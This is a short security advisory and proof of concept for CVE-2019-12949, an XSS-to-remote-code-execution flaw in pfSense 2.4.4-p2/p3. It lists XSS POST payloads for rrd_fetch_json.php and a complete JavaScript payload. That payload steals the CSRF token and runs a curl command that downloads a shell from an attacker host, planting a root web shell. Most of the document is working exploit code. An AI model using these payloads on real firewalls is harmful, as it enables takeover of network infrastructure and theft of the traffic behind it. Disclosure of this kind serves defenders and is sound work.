CVE-2019-12949 pfSense 2.4.4-p2 and 2.4.4-p3 Cross Sitete Scripting to Remote Code Execution Vulnerability
Information Description: In pfSense 2.4.4-p2 and 2.4.4-p3, if it is possible to trich au authenticated administrator into clicking on a button on a phishing page, an attacker can upload aritrary executable code via ding_command.php and rrd_fetch_json.php, to a server. Then, the remote attacker can run any command with root privileges on that server.
Researcher: Enter of The Tarantula Team, VinCSS (a member of Vingroup)
Attack vector: https://pfSense_IP_Address/rrd_fetch_json.php
Send Post: left=system-processor&right=null&start=&end=&resolution=300&timePeriod=<script>alert('XSS')</script>&graphtype=line&invert=true&refreshInterval=0
Send Post: left=system-processor&right=null&start=&end=&resolution=300&timePeriod=<script src='https://attacker.com/script.js'></script>&graphtype=line&invert=true&refreshInterval=0
script.js
<script> var xhr = new XMLHttpRequest(); xhr.open("GET", "https://pfSense_IP_Address/diag_command.php", false); xhr.withCredentials=true; xhr.send(null); var resp = xhr.responseText; console.log(resp); var start_idx = resp.indexOf('name=\'__csrf_magic\' value="'); var end_idx = resp.indexOf('" />', start_idx); var token = resp.slice(start_idx + 27, end_idx); var xhr1 = new XMLHttpRequest(); xhr1.open("POST", "https://pfSense_IP_Address/diag_command.php", false); xhr1.withCredentials=true; var params = "__csrf_magic="+token+"&txtCommand=curl https://attacker.com/shell.txt > shell.php&submit=EXEC"; xhr1.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr1.setRequestHeader("Content-length", params.length); xhr1.send(params); </script>Shell url: https://pfSense_IP_Address/shell.php